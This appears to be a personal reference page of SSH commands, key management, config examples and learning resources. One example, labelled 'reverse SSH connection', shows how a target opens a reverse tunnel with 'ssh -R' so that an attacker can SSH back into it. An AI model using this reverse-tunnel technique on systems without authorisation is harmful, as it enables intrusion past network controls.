SSH#
Secure Shell
Table of Contents#
Commands Reference#
Remote Ops#
ssh “secure shell”
options
-Renables remote port forwarding
[example]
Run command ps on the remote machine myserver.
ssh myserver ps
ssh username@myserver ps # specify user name
ssh -l username myserver ps # specify user name
ssh -p 22 myserver ps # specify port number
ssh myserver ps > /tmp/ps.out # redirect the output to a file on your local system
ssh myserver ps \> /tmp/ps.out # redirect the output to a file on the remote system
[example]
Run a script remotely.
ssh myserver bash < ./myscript.sh
[example]
test version with leading echo
for node in web-server{00..09}; do
echo ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'
done
ready version
for node in web-server{00..09}; do
ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'
done
[example]
wait for a reboot
until ssh user@10.10.10.10; do sleep 3; done
[example]
reverse SSH connection
12345is the port number that the remote system (the attacker) will use to SSH back into the targetlocalhost:22specifies the port number that the target system will listen on to receive a connection
ssh -R 12345:localhost:22 user@remoteipaddress
ssh localhost -p 12345 # setup a reverse connection from the attacker system after the target has connected
scp “secure copy”
[example]
Upload the file some_system.tar.gz to the home directory of user bob on remote system 10.0.0.45.
scp some_system.tar.gz bob@10.0.0.45:/home/bob/some_system.tar.gz
sftp “secure file transfer protocol”
Key Management#
ssh-addssh-add --apple-use-keychain ~/.ssh/id_ed25519ssh-add -llist private keys currently accessible to ssh-agent
ssh-keysignssh-keyscanssh-keygenssh-keygen -f ~/.ssh/id_ed25519 -t ed25519 -C "email@example.com"
Service#
sshdsftp-serverssh-agenteval "$(ssh-agent -s)"echo $SSH_AGENT_PIDecho $SSH_AUTH_SOCK
ssh-copy-id
ssh-copy-id -i ~/.ssh/id_ed25519 user@host
OpenSSH Files
~/.ssh/authorized_keys
~/.ssh/known_hosts
~/.ssh/config
Host github.com
AddKeysToAgent yes
Hostname github.com
IdentityAgent
IdentityFile ~/.ssh/id_ed25519
UseKeychain yes
User git
Resources#
Tools
clusterssh - Written in Perl, it opens a bunch of unmanaged terminals in windows.
mssh (MultiSSH) - GTK+–based multi-SSH client in a single GUI window.
mussh - MUltihost SSH Wrapper shell script.
pconsole - Intended for tiling window managers, spawns a terminal per host.
multixterm - Written in Expect & Tk, drives multiple xterms.
PAC Manager - A Perl SecureCRT-like GUI on Linux.
More
YouTube#
Akamai Developer
[ y ]
02-23-2022. “How to use Multiple SSH Keys | Managing Different SSH Keys on your System”.[ y ]
10-27-2021. “SSH Key Authentication | How to Create SSH Key Pairs”.
LearnLinuxTV
[ y ]
02-07-2023. “Linux Crash Course - Connecting to Linux Servers via SSH”.[ y ]
11-14-2022. “5 Must Have Tweaks to Secure OpenSSH”.[ y ]
03-23-2022. “Speed Up Your SSH Sessions with These Seven Quick SSH Config Tricks”.[ y ]
01-10-2022. “Getting Started with OpenSSH Key Management”.[ y ]
11-18-2021. “The OpenSSH Client Config File: Simplify your SSH Connections”.[ y ]
12-18-2020. “SSH Full Course - EVERYTHING You Need to Know!”. https://www.youtube.com/watch?v=YS5Zh7KExvE[ y ]
10-21-2019. “Linux Commands for Beginners 22 - Remote Management with OpenSSH”.
Low Level Learning
[ y ]
07-03-2024“new SSH exploit is absolutely wild”.[ y ]
04-03-2024. “revealing the features of the XZ backdoor”.
More
[ y ]
01-31-2019. Computerphile. “How Secure Shell Works (SSH) - Computerphile”.[ y ]
03-03-2024. Lawrence Systems. “Linux Supply Chain Attack Discovered in SSH CVE-2024-3094”.[ y ]
03-11-2020. PowerCert Animated Videos. “Telnet vs SSH Explained”.[ y ]
07-08-2018. Traversy Media. “SSH Crash Course | With Some DevOps”.
Texts#
[ h ] Barrett, Daniel J.; Richard E. Silverman; & Robert G. Byrnes. (2005). SSH The Secure Shell: The Definitive Guide. 2nd Ed. O’Reilly.
Terms#
[ w ] Host Key (authenticates computer)
[ w ] Identity Key (authenticates user)
[ w ] OpenSSH
[ w ] PuTTY
[ w ] SFTP Secure File Transfer Protocol
[ w ] SSH Secure Shell
[ w ] SSH Client
[ w ] SSH Server
[ w ] Telnet